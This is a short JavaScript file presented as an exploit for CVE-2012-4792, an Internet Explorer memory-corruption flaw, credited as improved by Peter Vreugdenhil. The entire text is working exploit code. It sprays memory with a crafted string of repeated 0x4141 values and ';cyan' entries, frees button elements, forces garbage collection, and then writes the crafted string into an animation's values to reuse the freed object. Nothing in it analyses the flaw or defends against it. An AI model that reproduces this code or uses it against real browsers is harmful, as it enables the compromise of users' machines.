Exploit for CVE-2012-4792 as improved by Peter Vreugdenhil

CVE-2012-4792-peter.js

e_form = document.getElementById("formelm");
e_div = document.getElementById("divelm");
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
  animvalues += animvalues
}
for(i = 0; i < 21; i++) {
	animvalues += ";cyan";
}
for(i =0; i < 20; i++) {
	document.createElement('button');
}
e_div.appendChild(document.createElement('button'))
e_div.firstChild.applyElement(e_form);

e_div.innerHTML = ""
e_div.appendChild(document.createElement('body'));

CollectGarbage();

try {
	a = document.getElementById('myanim');
	a.values = animvalues;
}
catch(e) {}